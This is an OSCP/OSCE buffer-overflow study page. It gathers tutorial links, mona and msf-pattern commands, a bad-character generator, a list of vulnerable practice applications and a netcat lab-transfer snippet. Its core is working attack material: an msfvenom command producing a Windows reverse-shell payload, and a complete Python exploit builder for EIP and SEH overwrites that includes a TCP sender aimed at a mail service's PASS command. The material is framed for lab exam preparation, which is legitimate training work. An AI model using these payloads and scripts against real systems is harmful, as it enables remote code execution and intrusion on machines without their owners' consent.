OSCP/OSCE Buffer Overflows Exploitation
Tutorials / Methodologies
- https://github.com/gh0x0st/Buffer_Overflow
- https://infosecsanyam261.gitbook.io/tryharder/buffer-overflow
- https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/
- https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/
- https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/buffer-overflow
- https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- https://eazeysec.com/BOF-Method/
- http://www.primalsecurity.net/tutorials/exploit-tutorials/
- http://www.fuzzysecurity.com/tutorials.html
- Jump to shellcode:
- https://www.abatchy.com/2017/05/jumping-to-shellcode.html
- https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/
# 1. find the offset: crash the service with a unique pattern of $length bytes, read EIP in the debugger
msf-pattern_create -l $length
# 2. map the value in EIP (as shown by the debugger, e.g. 39694438) back to its position in the pattern
msf-pattern_offset -l $length -q $EIP
# 3. bad chars: emit the test string below as a Python escape sequence (works on Python 2 and 3)
import sys
badchars = ""
for x in range(1, 256):   # \x00 is almost always bad, so start at \x01
    badchars += "\\x" + '{:02x}'.format(x)
sys.stdout.write(badchars + "\n")
badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# keep the bytes in this ascending order: after the crash, compare the dump in the debugger (!mona compare) position by position; the first byte that is mangled or truncates the string is a bad char. Remove it, regenerate and repeat until the whole string survives
# 4. opcodes for the instruction that redirects execution (here jmp esp = FF E4)
msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp
# select a dll module
!mona modules
# find address of "jmp esp"
!mona find -s "\xff\xe4" -m "libspp.dll"
# find "pop,pop,ret" for SEH
!mona seh -m "$module"
# generate Windows reverse shell
# -b must list every bad char found in step 3; EXITFUNC=thread keeps the service alive when the shell exits
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00"
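The steps above (pattern, offset, bad chars, jmp esp or pop pop ret, shellcode) assembled into one script. This is an added example, not code from this page or from any of the linked tutorials. It reimplements the msf cyclic pattern so the offset lookup can be checked offline; the EIP value 0x39694438 is the one reported in the SLmail 5.5 writeups and is used only to illustrate the lookup, the jmp esp address 0x625011AF and the pop pop ret address are placeholders to be replaced by whatever !mona find / !mona seh reports for your target, and the INT3 bytes stand in for msfvenom output. It also covers the SEH layout (nSEH short jump over the handler address) used for the SEH targets listed further down.

```python
import socket
import string
import struct

# --- cyclic pattern (same scheme as msf-pattern_create / msf-pattern_offset) ---

def pattern_create(length):
    """First `length` chars of the msf cyclic pattern: Aa0Aa1Aa2...Aa9Ab0Ab1..."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]          # pattern repeats after 20280 chars

def pattern_offset(eip, length=20280):
    """Position of the 4 bytes now in EIP within the pattern, or -1 if absent.

    The debugger shows EIP as a number (0x39694438), but those bytes were written
    to the stack little-endian ("8Di9"), so pack them that way before searching.
    """
    return pattern_create(length).encode("ascii").find(struct.pack("<I", eip))

# --- bad characters ---

def badchar_test_string(exclude=b"\x00"):
    """Every byte 0x00..0xff except those already known bad, in ascending order so
    the memory dump after the crash can be compared position by position."""
    return bytes(b for b in range(256) if b not in exclude)

def find_badchars(data, bad):
    """Sorted list of bad byte values present in `data` (empty means clean)."""
    return sorted({b for b in data if b in bad})

# --- payload layouts ---

def p32(addr):
    """32-bit address as it must appear on the stack (little-endian)."""
    return struct.pack("<I", addr)

def _check_clean(parts, bad):
    for name, blob in parts:
        hit = find_badchars(blob, bad)
        if hit:
            raise ValueError("%s contains bad chars: %s" % (name, [hex(b) for b in hit]))

def build_eip_payload(offset, jmp_esp, shellcode, bad=b"\x00", nop_sled=16):
    """Classic EIP overwrite: junk | jmp esp | NOP sled | shellcode.

    After RET, ESP points just past the overwritten return address, so the
    sled and shellcode follow it directly and `jmp esp` lands in the sled.
    """
    _check_clean((("jmp esp address", p32(jmp_esp)), ("shellcode", shellcode)), bad)
    return b"A" * offset + p32(jmp_esp) + b"\x90" * nop_sled + shellcode

def build_seh_payload(offset, pop_pop_ret, shellcode, bad=b"\x00", nop_sled=16):
    """SEH overwrite: junk | nSEH (jmp short +6) | SEH (pop pop ret) | NOPs | shellcode.

    When the exception fires, `pop pop ret` returns into nSEH; EB 06 there jumps
    over the 4-byte handler address that follows it, straight into the NOP sled.
    """
    nseh = b"\xeb\x06\x90\x90"
    _check_clean((("pop pop ret address", p32(pop_pop_ret)), ("shellcode", shellcode)), bad)
    return b"A" * offset + nseh + p32(pop_pop_ret) + b"\x90" * nop_sled + shellcode

def send_payload(host, port, prefix, payload, suffix=b"\r\n"):
    """Deliver prefix + payload + suffix over TCP (prefix is the vulnerable command,
    e.g. b"PASS " or b"TRUN /.:/"); the banner read assumes the service sends one."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)
        s.sendall(prefix + payload + suffix)

if __name__ == "__main__":
    # step 1: crash with a pattern; the debugger then shows EIP = 0x39694438 (illustration)
    print("offset:", pattern_offset(0x39694438))            # 2606
    # step 2: bad chars; \x00 excluded up front, add others as the dump reveals them
    print("badchars:", badchar_test_string(b"\x00\x0a\x0d").hex())
    # step 3: placeholder jmp esp address and INT3 stub; bad list as found in step 2
    payload = build_eip_payload(2606, 0x625011AF, b"\xcc" * 4, bad=b"\x00\x0a\x0d")
    print("payload length:", len(payload), "ret bytes:", payload[2606:2610].hex())
    # send_payload("192.168.119.223", 110, b"PASS ", payload)   # only against your lab target
```

Both builders refuse to assemble a payload whose return address or shellcode contains a known bad byte, which is the check most often skipped when an exploit "almost" works: a jmp esp address with a 0x00 or 0x0a in it is silently truncated by string or line-oriented parsers.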
Tools
- Immunity Debugger: A powerful new way to write exploits, analyze malware, and reverse engineer binary files (whitepaper, course)
- OllyDbg: A 32-bit assembler level analysing debugger for Microsoft Windows (tut)
- WinDbg: A kernel-mode and user-mode debugger that is included in Debugging Tools for Windows (tut)
- edb: A Linux equivalent of the famous Olly debugger on the Windows platform.
- Boofuzz: Network Protocol Fuzzing for Humans
- mona: A Python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform) (tut, cheatsheet)
# locate the msf pattern in registers and memory after the crash
!mona findmsp
# list loaded modules and their protections; -o excludes OS modules (the application's own DLLs are more reliable, since they do not change with patch level)
!mona modules [-o]
# find jmp esp candidates
!mona jmp -r esp [-o]
# find pop,pop,ret candidates for SEH
!mona seh
!mona seh -m $module -o
# write bytearray.bin without the bad chars given, then compare it against the bytes found at the given stack address
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\pcmanftpd2\bytearray.bin -a 0012ED6C
# search a module for specific opcodes
!mona find -s "\xff\xe4" -m "libspp.dll"
Exploitation for Practice
- PWK 2020
- Vulnserver (github, tut, exploited functions, TRUN exploit)
- Easy File Sharing Web Server 7.2 (exploit, code, tut)
- Seattle Lab Mail (SLmail) 5.5 (python exploit, C exploit)
- Freefloat FTP Server 1.0 (exploit)
- MiniShare 1.4.1 (exploit)
- Savant Web Server 3.1 (exploit)
- WarFTP 1.65 (exploit)
- BigAnt Server 2.52 (exploit, tut)
- ASX to MP3 Converter 1.82.50 (exploit): tut
- Easy RM to MP3 Converter (exploit)
- Zip-n-Go 4.9 (exploit, FileFuzz)
- IDSECCONF 2013 myftpd challenge (tut-xp, tut-win7)
- QuickZip 4.x (exploit, tut1, tut2)
- Easy Chat Server 3.1 (tut)
- dostackbufferoverflowgood (exploit&tut)
- Vulnhub machines: Brainpan series, SmashTheTux: 1.0.1, Cyberry: 1, Pinky’s Palace series, Lord Of The Root: 1.0.1
Structured Exception Handler (SEH)
- Konica Minolta FTP Utility 1.00 (exploit, tut)
- Millenium MP3 Studio 2.0 (exploit, tut)
- IntraSRV 1.0 (exploit, tut)
- File Sharing Wizard 1.5.0 (exploit, tut)
More Targets
- https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice
- https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
- https://exploit.education/
- https://overthewire.org/wargames/narnia/
- Useful links: https://github.com/security-prince/PWK-OSCP-Preparation-Roadmap/blob/master/BOF
Advanced Topics for OSCE
- Windows drivers: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
- https://github.com/dhn/OSCE
- https://purpl3f0xsec.tech/2019/06/18/osce-prep-1.html
- Windows Exploitation Pathway
- https://github.com/epi052/OSCE-exam-practice
Books
- Hacking - The Art of Exploitation
- The Shellcoder’s Handbook: Discovering and Exploiting Security Holes
- Buffer Overflow Attacks: Detect, Exploit, Prevent
- Writing Security Tools and Exploits
- Penetration Testing with Shellcode: Detect, exploit, and secure network-level and operating system vulnerabilities
Lab setup: transfer the vulnerable binary between the Windows VM and Kali
# From Kali, run first (listener writes whatever arrives to VulnApp1.exe)
~/OSCP/windows_buffer_overflows$ nc -l -p 1234 > VulnApp1.exe
# From Windows (sends the file to the Kali listener)
C:\Tools\windows_buffer_overflows> nc -w 3 192.168.119.223 1234 < VulnApp1.exe
# VM networking used here: Windows 10 on a Bridged Adapter, Kali on NAT
- Download windows 10 x86 ISO: https://www.microsoft.com/en-gb/software-download/windows10ISO